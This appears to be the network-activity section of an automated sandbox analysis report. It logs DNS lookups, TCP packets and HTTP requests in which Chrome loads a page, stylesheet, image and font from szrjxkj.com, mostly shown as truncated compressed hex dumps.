            Mar 13, 2025 10:53:50.184174061 CET4972580192.168.2.438.174.150.133
            Mar 13, 2025 10:53:50.186372995 CET804972538.174.150.133192.168.2.4
            Mar 13, 2025 10:53:50.186414957 CET804972538.174.150.133192.168.2.4
            Mar 13, 2025 10:53:50.186451912 CET804972538.174.150.133192.168.2.4
            Mar 13, 2025 10:53:50.186455965 CET4972580192.168.2.438.174.150.133
            Mar 13, 2025 10:53:50.186734915 CET4972580192.168.2.438.174.150.133
            Mar 13, 2025 10:53:50.286159039 CET804972538.174.150.133192.168.2.4
            Mar 13, 2025 10:53:50.333602905 CET4972580192.168.2.438.174.150.133
            Mar 13, 2025 10:53:50.352735996 CET4972580192.168.2.438.174.150.133
            Mar 13, 2025 10:53:50.357676983 CET804972538.174.150.133192.168.2.4
            Mar 13, 2025 10:53:50.688874006 CET804972538.174.150.133192.168.2.4
            Mar 13, 2025 10:53:50.744369984 CET4972580192.168.2.438.174.150.133
            Mar 13, 2025 10:54:00.594347000 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:00.594432116 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:00.594521999 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:00.595722914 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:00.595748901 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:02.563102961 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:02.563740969 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:02.563764095 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:02.564948082 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:02.565026045 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:02.566823006 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:02.566926956 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:02.620811939 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:02.620836973 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:02.667701960 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:03.933607101 CET4973480192.168.2.438.174.150.133
            Mar 13, 2025 10:54:03.938465118 CET804973438.174.150.133192.168.2.4
            Mar 13, 2025 10:54:03.949248075 CET4973580192.168.2.438.174.150.133
            Mar 13, 2025 10:54:03.954207897 CET804973538.174.150.133192.168.2.4
            Mar 13, 2025 10:54:04.168025017 CET4974180192.168.2.438.174.150.133
            Mar 13, 2025 10:54:04.172925949 CET804974138.174.150.133192.168.2.4
            Mar 13, 2025 10:54:04.246130943 CET4974380192.168.2.438.174.150.133
            Mar 13, 2025 10:54:04.250987053 CET804974338.174.150.133192.168.2.4
            Mar 13, 2025 10:54:04.496100903 CET4974280192.168.2.438.174.150.133
            Mar 13, 2025 10:54:04.500794888 CET804974238.174.150.133192.168.2.4
            Mar 13, 2025 10:54:04.808634043 CET4972680192.168.2.438.174.150.133
            Mar 13, 2025 10:54:04.813534975 CET804972638.174.150.133192.168.2.4
            Mar 13, 2025 10:54:04.839898109 CET4974480192.168.2.438.174.150.133
            Mar 13, 2025 10:54:04.844723940 CET804974438.174.150.133192.168.2.4
            Mar 13, 2025 10:54:06.855499029 CET4974680192.168.2.438.174.150.133
            Mar 13, 2025 10:54:06.860183954 CET804974638.174.150.133192.168.2.4
            Mar 13, 2025 10:54:10.338892937 CET4973180192.168.2.4142.250.185.99
            Mar 13, 2025 10:54:10.344007015 CET8049731142.250.185.99192.168.2.4
            Mar 13, 2025 10:54:10.344063044 CET4973180192.168.2.4142.250.185.99
            Mar 13, 2025 10:54:12.150820017 CET49745443192.168.2.4156.224.2.38
            Mar 13, 2025 10:54:12.150849104 CET44349745156.224.2.38192.168.2.4
            Mar 13, 2025 10:54:12.242736101 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:12.242813110 CET44349754216.58.206.36192.168.2.4
            Mar 13, 2025 10:54:12.243020058 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:12.967117071 CET49754443192.168.2.4216.58.206.36
            Mar 13, 2025 10:54:12.967161894 CET44349754216.58.206.36192.168.2.4
            TimestampSource PortDest PortSource IPDest IP
            Mar 13, 2025 10:52:56.638173103 CET53595771.1.1.1192.168.2.4
            Mar 13, 2025 10:52:56.674694061 CET53598571.1.1.1192.168.2.4
            Mar 13, 2025 10:53:00.062413931 CET53638811.1.1.1192.168.2.4
            Mar 13, 2025 10:53:00.285212994 CET53586901.1.1.1192.168.2.4
            Mar 13, 2025 10:53:00.542087078 CET5614153192.168.2.41.1.1.1
            Mar 13, 2025 10:53:00.542237997 CET5418353192.168.2.41.1.1.1
            Mar 13, 2025 10:53:00.548872948 CET53561411.1.1.1192.168.2.4
            Mar 13, 2025 10:53:00.550137997 CET53541831.1.1.1192.168.2.4
            Mar 13, 2025 10:53:01.712451935 CET6339453192.168.2.41.1.1.1
            Mar 13, 2025 10:53:01.736921072 CET5517553192.168.2.41.1.1.1
            Mar 13, 2025 10:53:01.744163036 CET53633941.1.1.1192.168.2.4
            Mar 13, 2025 10:53:01.760047913 CET53551751.1.1.1192.168.2.4
            Mar 13, 2025 10:53:01.765011072 CET6039453192.168.2.41.1.1.1
            Mar 13, 2025 10:53:01.765264034 CET6251353192.168.2.41.1.1.1
            Mar 13, 2025 10:53:01.778657913 CET53603941.1.1.1192.168.2.4
            Mar 13, 2025 10:53:01.783942938 CET53625131.1.1.1192.168.2.4
            Mar 13, 2025 10:53:01.785314083 CET6174553192.168.2.41.1.1.1
            Mar 13, 2025 10:53:01.809473991 CET53617451.1.1.1192.168.2.4
            Mar 13, 2025 10:53:14.508892059 CET53607371.1.1.1192.168.2.4
            Mar 13, 2025 10:53:17.334670067 CET53497261.1.1.1192.168.2.4
            Mar 13, 2025 10:53:18.282366991 CET6439353192.168.2.41.1.1.1
            Mar 13, 2025 10:53:18.282521963 CET6181153192.168.2.41.1.1.1
            Mar 13, 2025 10:53:18.300187111 CET53643931.1.1.1192.168.2.4
            Mar 13, 2025 10:53:18.301259995 CET53618111.1.1.1192.168.2.4
            Mar 13, 2025 10:53:18.301727057 CET5173353192.168.2.41.1.1.1
            Mar 13, 2025 10:53:18.322010040 CET53517331.1.1.1192.168.2.4
            Mar 13, 2025 10:53:18.599807024 CET5668153192.168.2.41.1.1.1
            Mar 13, 2025 10:53:18.600012064 CET5342553192.168.2.41.1.1.1
            Mar 13, 2025 10:53:18.622185946 CET53534251.1.1.1192.168.2.4
            Mar 13, 2025 10:53:18.629034996 CET53566811.1.1.1192.168.2.4
            Mar 13, 2025 10:53:27.407665968 CET53561641.1.1.1192.168.2.4
            Mar 13, 2025 10:53:36.411395073 CET53504721.1.1.1192.168.2.4
            Mar 13, 2025 10:53:56.365825891 CET53631841.1.1.1192.168.2.4
            Mar 13, 2025 10:53:59.001035929 CET53592001.1.1.1192.168.2.4
            Mar 13, 2025 10:54:00.490242958 CET53643761.1.1.1192.168.2.4
            Mar 13, 2025 10:54:01.173080921 CET138138192.168.2.4192.168.2.255
            TimestampSource IPDest IPChecksumCodeType
            Mar 13, 2025 10:53:01.760279894 CET192.168.2.41.1.1.1c1e1(Port unreachable)Destination Unreachable
            Mar 13, 2025 10:53:18.322078943 CET192.168.2.41.1.1.1c1e1(Port unreachable)Destination Unreachable
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Mar 13, 2025 10:53:00.542087078 CET192.168.2.41.1.1.10x75daStandard query (0)www.google.comA (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:00.542237997 CET192.168.2.41.1.1.10xc03bStandard query (0)www.google.com65IN (0x0001)false
            Mar 13, 2025 10:53:01.712451935 CET192.168.2.41.1.1.10x32a9Standard query (0)szrjxkj.comA (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:01.736921072 CET192.168.2.41.1.1.10x7e08Standard query (0)szrjxkj.com65IN (0x0001)false
            Mar 13, 2025 10:53:01.765011072 CET192.168.2.41.1.1.10x947eStandard query (0)szrjxkj.comA (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:01.765264034 CET192.168.2.41.1.1.10x7e50Standard query (0)szrjxkj.com65IN (0x0001)false
            Mar 13, 2025 10:53:01.785314083 CET192.168.2.41.1.1.10x2cc7Standard query (0)szrjxkj.com65IN (0x0001)false
            Mar 13, 2025 10:53:18.282366991 CET192.168.2.41.1.1.10x9ee9Standard query (0)szrjxkj.comA (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:18.282521963 CET192.168.2.41.1.1.10x7b1cStandard query (0)szrjxkj.com65IN (0x0001)false
            Mar 13, 2025 10:53:18.301727057 CET192.168.2.41.1.1.10x7e65Standard query (0)szrjxkj.com65IN (0x0001)false
            Mar 13, 2025 10:53:18.599807024 CET192.168.2.41.1.1.10xe022Standard query (0)oudngmslhifnsf.gdmgcyy.comA (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:18.600012064 CET192.168.2.41.1.1.10xa53fStandard query (0)oudngmslhifnsf.gdmgcyy.com65IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Mar 13, 2025 10:53:00.548872948 CET1.1.1.1192.168.2.40x75daNo error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:00.550137997 CET1.1.1.1192.168.2.40xc03bNo error (0)www.google.com65IN (0x0001)false
            Mar 13, 2025 10:53:01.744163036 CET1.1.1.1192.168.2.40x32a9No error (0)szrjxkj.com38.174.150.133A (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:01.760047913 CET1.1.1.1192.168.2.40x7e08Server failure (2)szrjxkj.comnonenone65IN (0x0001)false
            Mar 13, 2025 10:53:01.778657913 CET1.1.1.1192.168.2.40x947eNo error (0)szrjxkj.com38.174.150.133A (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:01.783942938 CET1.1.1.1192.168.2.40x7e50Server failure (2)szrjxkj.comnonenone65IN (0x0001)false
            Mar 13, 2025 10:53:01.809473991 CET1.1.1.1192.168.2.40x2cc7Server failure (2)szrjxkj.comnonenone65IN (0x0001)false
            Mar 13, 2025 10:53:18.300187111 CET1.1.1.1192.168.2.40x9ee9No error (0)szrjxkj.com38.174.150.133A (IP address)IN (0x0001)false
            Mar 13, 2025 10:53:18.301259995 CET1.1.1.1192.168.2.40x7b1cServer failure (2)szrjxkj.comnonenone65IN (0x0001)false
            Mar 13, 2025 10:53:18.322010040 CET1.1.1.1192.168.2.40x7e65Server failure (2)szrjxkj.comnonenone65IN (0x0001)false
            Mar 13, 2025 10:53:18.629034996 CET1.1.1.1192.168.2.40xe022No error (0)oudngmslhifnsf.gdmgcyy.com156.224.2.38A (IP address)IN (0x0001)false
            • szrjxkj.com
            • www.google.com
            • c.pki.goog
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.44972538.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:04.747417927 CET443OUTGET /dongtai/8622.html HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:14.477646112 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:14 GMT
            Content-Type: text/html
            Last-Modified: Wed, 29 Jan 2025 01:02:43 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"67997e33-8838"
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 33 33 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e5 7d 59 93 dc 46 92 e6 f3 f2 57 e4 b0 1f 34 23 53 b1 f2 3e b4 c5 da 1d 69 a7 67 76 6d ad 57 b6 23 b3 b6 35 5b b3 34 20 81 04 90 07 90 09 20 4f 9b 87 22 29 b2 8a 37 75 f0 26 c5 43 a4 a4 d6 51 a4 9a 77 15 8f 87 fd 27 33 85 ac ac 27 fd 85 f5 23 10 00 b2 b2 48 aa 5b bd 6b bd 2b 9b e6 54 e2 88 f0 f0 70 ff dc c3 c3 3d b0 f4 37 ff e9 bf 7d f8 f1 ff f8 e8 1f 52 a6 df 6e 2d ef 5b c2 ff 97 6a 29 b6 71 70 ff d8 5c f8 f0 77 fb f1 9a ae 68 cb fb 52 f0 df 52 5b f7 95 54 cd 54 5c 4f f7 0f ee ef f9 f5 85 32 3c 11 dd 32 7d bf b3 a0 77 7b 56 ff e0 fe e1 42 4f 59 a8 39 ed 8e e2 5b 6a 4b df 9f aa 39 b6 af db f0 9e a5 1f d4 35 43 0f df f4 2d bf a5 2f 07 5f 1f de 7a 71 7e 72 ed f8 e4 fc da f6 fa ad ed 73 c7 3e fe 68 e7 b3 9f 82 53 47 83 6b df 7e f0 cf 1f ee 7c fe 72 72 f6 dc f6 99 fb 93 8b 8f b7 af 7c b2 7d e3 55 f0 e4 ee f4 e1 b3 ed 2f be fd f9 f9 8d aa df 09 d6 2f 4d 2e 3c 9b fc f8 d5 f6 f1 b5 ad a7 27 a7 2f 5e 2c 2d 72 d3 31 02 6d a5 ad 1f dc df d4 47 03 c7 d5 bc 18 4d [TRUNCATED]
            Data Ascii: 336d}YFW4#S>igvmW#5[4 O")7u&CQw'3'#H[k+Tp=7}Rn-[j)qp\whRR[TT\O2<2}w{VBOY9[jK95C-/_zq~rs>hSGk~|rr|}U//M.<'/^,-r1mGMagqWq_nN>&xzhj1>jnTku|c/@Om=.z_O~}|~z5x,'8xr^o^Qc]SV\?X`$???S[w&>a/JB/qB_[OOgz=Md#sk?Won?lm~Uq|ro1,7jze[fKykY[AWS:3ZOY `S_+cWfa!coAS[JjOwK<RbCn{q 5An\:^gW?J~A?jDXk&|Bo *^q*m>Wk^zaEF}Kn4OYR</-^&p`{WWd#t>5;q_Z}u{U
            Mar 13, 2025 10:53:14.477684021 CET1236INData Raw: 6b 8e c4 03 82 af d8 39 11 10 6b 04 31 16 b4 5f 77 67 9e 99 7d ce 75 06 29 a5 65 19 f6 82 e5 eb 6d 6f a1 06 c0 3c f7 a5 d9 17 6b 4e 6b a1 65 2c e4 00 cd 5b 0b 6d 6d a1 42 7f 54 e6 74 27 c9 03 8b c1 9c 8d c6 d5 72 0c 47 aa ea 6b de a5 de ad b6 21
            Data Ascii: k9k1_wg}u)emo<kNke,[mmBTt'rGk!KfC~XyVGl_|e6GWZ-;7~O~#X?>z^{~?\[\P1eM+l^3E1&"sNS3Ss{];e`;&z
            Mar 13, 2025 10:53:14.477711916 CET448INData Raw: 09 29 4f 67 34 d0 24 5f c3 a9 e0 d7 32 5e 2b e7 d4 f1 2d 71 9d 49 e1 9b 0d 70 d1 fb 24 ad 44 0b 8b 4e 0c be 1a cd a1 4f 1a 2b 04 68 06 30 b2 46 d5 b3 e8 3e e3 b6 d4 7f ad a3 8e cb 24 1b c8 37 4b 8c a0 d4 6c 57 74 12 b6 98 2f 39 c7 53 48 7d 00 e6
            Data Ascii: )Og4$_2^+-qIp$DNO+h0F>$7KlWt/9SH}A:gmJTY:0P6 ^P#Z5W,o-L3go=nbQflZiNc3e#8AVf\dv\%;ape0nclP\bZNC,R9GH
            Mar 13, 2025 10:53:14.480199099 CET1236INData Raw: 93 04 f4 c4 86 38 ca 96 a9 59 a0 07 dd 00 9a a6 72 bf d9 22 43 47 4e 40 cc e7 92 0b 0b d7 1d d7 e9 89 c8 e7 4a 0c 53 f5 6c 8b c0 1b 87 49 f2 22 3c 9c 6a 57 25 33 22 04 86 fd f8 88 1c 7b 54 2a b0 99 21 67 7e d6 f6 0d ed 76 97 9a 65 98 45 0b 1c b1
            Data Ascii: 8Yr"CGN@JSlI"<jW%3"{T*!g~veE5vfX2-?o`5S'?560ZKIA\yyJitdZ6O[0jYY'[GSXVv-ZE'<T$~!\aACWJ0Z855UB4XZGSD
            Mar 13, 2025 10:53:14.480232954 CET224INData Raw: e2 f3 0c 36 e1 0c 7b e3 4a a9 96 8c 55 8b b0 96 e7 65 5d 93 f4 06 b0 9f fc 0a 7c be 99 d1 06 1c dc 67 8f 82 18 1e 61 75 25 3f ce 44 71 e1 84 41 50 d2 4e cf a5 45 91 ca da 8b cd 8d bb ae 92 21 3c a6 59 16 5c 8c 99 91 61 c9 d0 ea a4 47 21 2b 81 bc
            Data Ascii: 6{JUe]|gau%?DqAPNE!<Y\aG!+hMSmRsaINb[A/!,="nC#}dd:6mqLA^;Z6<|fZO"PQ:^Hbz:3AA
            Mar 13, 2025 10:53:14.480243921 CET1236INData Raw: 2b 5b 57 68 c6 04 9c c6 a6 bf ef 78 d5 4a b8 0e ef 85 84 76 21 2a 4e bd c1 14 cd ae 4c 7d 35 5b 31 c9 78 31 06 90 63 8d 82 61 e7 15 67 4c a1 8e 70 e1 4d 1b 28 78 ab ac 38 a3 11 f9 59 a1 af 99 d4 4c db eb 69 79 12 5c 52 24 36 a6 24 bb 85 8c 95 27
            Data Ascii: +[WhxJv!*NL}5[1x1cagLpM(x8YLiy\R$6$'(MG2wdgq"o=_<DR2h!E/J,vJ} 6dyx2):&|A@L31NhL;$mPqN*`FDaEPp
            Mar 13, 2025 10:53:14.480253935 CET224INData Raw: fe 00 32 0c 12 f2 f3 f3 2b f1 07 52 07 53 ff a8 78 a9 8f 5c 48 d6 4f fd af 8b f4 e3 bf 5a 6d cb 27 71 41 45 5c 45 8d 93 cf 4c 4e ad e2 18 01 02 69 b6 26 9f bc 9a 7c 82 cd 4e ee c1 bf df c1 63 42 d7 01 9e 36 9f 4c 6e 22 1f a4 4e 19 03 dd 82 47 83
            Data Ascii: 2+RSx\HOZm'qAE\ELNi&|NcB6Ln"NG^2)(T70$1errw>sk(&Wak+owV{!^0}z1h/A 'xup"#\ G6mIP&hI'7n_
            Mar 13, 2025 10:53:14.484396935 CET1236INData Raw: 3b 09 4a 1b 1c 3f 1d 21 f4 b3 07 c1 f5 55 c9 62 24 12 40 f5 e6 b3 c9 e9 f5 e9 ea 77 c1 93 9f a0 03 e8 6f f2 d3 e1 e9 fd 23 93 f3 0f 25 5b e0 49 a9 76 73 85 9b c1 73 f2 e3 9d e0 ce 05 7c 18 24 75 e3 aa a8 be 21 58 04 74 80 17 b7 5e 5e 65 21 fe d7
            Data Ascii: ;J?!Ub$@wo#%[Ivss|$u!Xt^^e!kt}_W37YSVM'AkVPkXEr112P,Zp,rzWo6@cE|b<I@@J .62Fr*AXn|1wwrdzS)2RtNWo
            Mar 13, 2025 10:53:14.484414101 CET224INData Raw: 7f f8 3a 14 b9 c9 0d 58 e2 5f dd 2d d8 c0 58 96 b7 19 49 83 66 84 d3 77 fc ab 9d cb 77 b8 31 d4 29 76 2d 0f 7f 3b b9 f9 14 6c 6b 88 13 f0 b6 98 c3 33 c7 82 b3 7f 8c c6 0d 81 0c 5a fc 92 87 b7 02 2e 83 34 05 1c 77 a0 41 30 8e 06 67 4f c0 64 33 28
            Data Ascii: :X_-XIfww1)v-;lk3Z.4wA0gOd3(iYgA/~-i}7zr]B%PzkcQ#iJ eub.lU%^>@7=aQ)8zngO&N.T)M*>>u
            Mar 13, 2025 10:53:14.484426975 CET1236INData Raw: 40 70 96 9e 83 66 c8 37 e3 17 50 4a 2f 3c db 7a f9 0a a4 1d 1d 39 08 6f ad 1c 82 3f a6 2f 36 27 d7 5f 46 c5 f1 af be df 59 b9 11 ac 9f 42 9f 8a a2 0f 34 43 04 68 51 4c eb f9 46 a2 ff 9d d5 55 e8 0a ed d3 cd d5 60 15 dd 01 f1 e8 99 ef 26 17 5e a0
            Data Ascii: @pf7PJ/<z9o?/6'_FYB4ChQLFU`&^S8b3or`,(kR@?N~i~{f99Z?B`<{Sd%=~KPTc.,78[(tZq(a F,C`mur6nln1QS
            Mar 13, 2025 10:53:14.484440088 CET224INData Raw: 16 79 5c 43 d1 8a 6e 6b e3 24 2c 59 20 1d 0b 2b e0 f0 18 8d 64 ef 10 66 11 bd 4f fe 78 0b bd fb 8d 63 e2 b9 d7 4f c2 eb cf 80 a0 03 1a f6 e4 27 9d 80 f3 81 48 ec 81 6c a6 76 1b f2 25 bc 44 3a d3 6c e7 f1 04 8b b9 05 75 bb 5e 98 49 79 d3 5d c3 e9
            Data Ascii: y\Cnk$,Y +dfOxcO'Hlv%D:lu^Iy]S!k4%4$0'^[5K&sPIf8yeJV+D6X8UE'3tq)s0Ldizq~T.WE!QhF}JUJWw=H/Qy
            Mar 13, 2025 10:53:14.503439903 CET352OUTGET /skin/css/bootstrap.min.css HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: text/css,*/*;q=0.1
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:14.832324982 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:14 GMT
            Content-Type: text/css
            Last-Modified: Wed, 08 Nov 2023 16:06:24 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb200-25683"
            Expires: Thu, 13 Mar 2025 21:53:14 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 36 64 34 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 8f 23 c9 91 26 fc 7d 81 fd 0f 9c 2a 34 ba 4a 4d b2 78 24 f3 60 a1 85 91 84 19 ec 00 92 3e 8c 76 80 05 7a 7b 81 20 19 cc e4 14 af 25 99 75 28 91 f3 db df c7 0e f7 f0 33 22 98 c9 1a e9 dd dd d1 48 c5 8c 30 37 37 33 37 37 37 b3 70 37 ff f0 9b 7f f8 af ff a5 f3 9b ce ef 77 bb d3 f1 74 28 f6 9d cf 57 fd 51 7f d8 79 f7 70 3a ed 8f d3 0f 1f ee cb d3 cc bc ec cf 77 9b 0f ef b9 c1 1f 76 fb 6f 87 d5 fd c3 a9 33 1a 0c 87 3d fc cf 6d e7 bf 3f 94 0e a2 df 3d 9e 1e 76 87 63 1e fa cb ea 74 2a 0f dd ce bf 6c e7 7d 40 e1 ff a8 cf e9 87 2f 5f be f4 6d 97 9b 19 75 ca 48 fe b8 9a 97 db 63 b9 e8 3c 6e 17 e5 a1 f3 a7 7f f9 ef 0e 95 ab d3 c3 23 83 7e 38 7d 99 1d 3f d8 f6 1f 66 eb dd ec c3 a6 38 a2 ab 0f 7f fc 97 3f fc d3 9f ff f2 4f cc c1 87 e9 01 6c 3d f5 7a b3 f5 63 39 7d 3b 18 dc cc 96 cb 8f bd de 6a bb 58 dd ef a6 6f af af 87 83 e5 08 0f f6 8f 87 fd 1a 10 d7 cb ab d1 7c 48 0f 56 db 4f d3 b7 e5 ed b8 bc 9d e3 cf 43 b9 98 be 5d cc c7 93 ab 09 fe da 1d 8a ed 3d a0 [TRUNCATED]
            Data Ascii: 6d49i#&}*4JMx$`>vz{ %u(3"H0773777p7wt(WQyp:wvo3=m?=vct*l}@/_muHc<n#~8}?f8?Ol=zc9};jXo|HVOC]=rxze7Tk9o7hv?<Ni?@fr?{jWjgjSe:Pn|^LWj{ k}.z~z_S"yrL'7bzs}>]OFp4,jw,<^0?&7)weM_wi}?b}gto~G`*w?mvzSf[6//'ky.?G|n{cWPVmv/ooiI7P>v_{_igUON#iG=<*}Z_O<`C7'Map`PnOb_Z~^%xVP
            Mar 13, 2025 10:53:18.079683065 CET402OUTGET /skin/images/footer-bgshape.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:18.410412073 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:12 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26c-391f4"
            Expires: Sat, 12 Apr 2025 09:53:18 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 34 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 bb 77 54 93 69 b4 3d 1c 02 01 01 11 14 94 0e ce a0 20 4d 40 a4 04 81 80 ce 88 05 09 8a 54 81 50 44 84 28 2d 22 bd aa 80 12 01 45 8a 10 12 1c 95 16 aa 48 15 12 9a 41 42 73 a4 04 e9 0a 21 9a 50 13 42 12 08 e1 8b f3 5b eb bb 33 f7 ae f5 ae f5 ae bc 7f 9e 9c 67 9f bd f7 d9 cf 63 7b 3b 1b 09 31 05 31 00 00 20 71 f1 c2 1f d7 00 00 91 44 00 40 60 60 9f 30 ff cb e9 1f 0d 34 fe 4b 00 71 cd e6 2c a0 7a 48 e9 27 ff 87 90 bf f5 15 6b 00 a0 2e 53 9c eb 0d 02 00 f6 5a 2f fe 61 7d 3d d2 73 b9 fd 0a d6 8f d4 50 12 15 f3 b5 2c 45 51 d8 08 69 2d e1 fd 40 c7 f4 80 7c 6a 56 78 70 2e f1 f0 be 67 2f d5 4f 2e 29 1c ce ef 29 2b ab 94 f9 ba 19 0c 3e d8 ca 52 25 88 4e 79 34 61 09 86 84 48 8a 12 bc 28 ee ac 6a ae 8c 2a 25 ce bb 76 bc 00 11 3b d8 b2 35 7b b0 47 1a be 96 d0 8a 8b de 1a 86 e1 76 96 61 a6 93 f1 2e 3b 99 2c f4 2e 26 94 cb ee d3 0b 8e df 82 e6 fa b9 fe cf c3 14 a3 fe dc db 69 da 5b f9 29 9b b0 73 71 72 8f 3b 95 d9 1d ff c2 77 62 8f 3d 95 f0 64 a3 69 3c 16 e9 b7 7f [TRUNCATED]
            Data Ascii: 4000dwTi= M@TPD(-"EHABs!PB[3gc{;11 qD@``04Kq,zH'k.SZ/a}=sP,EQi-@|jVxp.g/O.))+>R%Ny4aH(j*%v;5{Gva.;,.&i[)sqr;wb=di<~vWV(9UF5.}y:Pf:qhu&R%fLUo{Qj82x 6Hl'v&'3^6eA+aeoc?i5bZSO,"q'}HW/*U!boYF[@+ST!HpVKx9krM@573fiS*kt`oc7h-+tp=pj5&A\D|!lBQ^qRm[>b|c6c?4rPS$!`&wi#|m/bYAu'UUzw}~Jz&g.RP@I;>RYgkgaZ1;L<HqO|(-\`48/
            Mar 13, 2025 10:53:27.382411957 CET394OUTGET /skin/fonts/Material-Design-Iconic-Font.woff2?v=2.2.0 HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Origin: http://szrjxkj.com
            Accept: */*
            Referer: http://szrjxkj.com/skin/css/plugins.css
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:49.914751053 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:49 GMT
            Content-Type: font/woff2
            Content-Length: 38384
            Last-Modified: Wed, 08 Nov 2023 16:37:38 GMT
            Connection: keep-alive
            ETag: "654bb952-95f0"
            Strict-Transport-Security: max-age=31536000
            Accept-Ranges: bytes
            Data Raw: 77 4f 46 32 00 01 00 00 00 00 95 f0 00 0e 00 00 00 01 83 8c 00 00 95 90 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 06 60 00 82 42 08 04 11 08 0a 85 99 3c 84 95 63 01 36 02 24 03 98 30 0b 8c 1a 00 04 20 05 85 41 07 bd 02 3f 77 65 62 66 06 5b 9f 3a 91 42 c5 c5 76 8a fb 0a 48 e7 d8 36 2d 11 10 0f f1 f2 18 85 b8 1d d8 aa df 7e 57 9d 1d 68 61 e3 00 06 cf b7 63 f6 ff ff ff ff e7 26 8d 31 d6 6d c0 06 20 aa 59 d5 57 df 3f 91 ec 70 54 41 ab a4 c3 58 a2 c7 80 3e c5 d6 4e 3b 69 68 dc a2 c6 46 87 98 42 7c 84 e8 9e 4d b4 1f 70 41 c5 a9 2b 3a b1 81 94 bf 3a 1a 56 b0 1a 28 c9 4a 5e 94 67 75 5c 42 67 88 d9 e6 16 d1 4d 26 02 81 14 0a 81 48 87 f3 0e 8f 46 14 ea 62 56 a2 15 12 95 52 6d 63 55 4d 51 75 26 2b ed 29 70 88 ab 85 7f 70 6b f7 a8 68 c1 fd 71 81 17 d4 0a 3b ce a6 be c0 9c 9d 4d 78 ae 78 39 c2 70 86 8f f5 7d f3 07 5e be 32 45 67 af 18 b4 66 5b f9 fe a1 e7 63 ff b0 5e b2 f6 33 ad 96 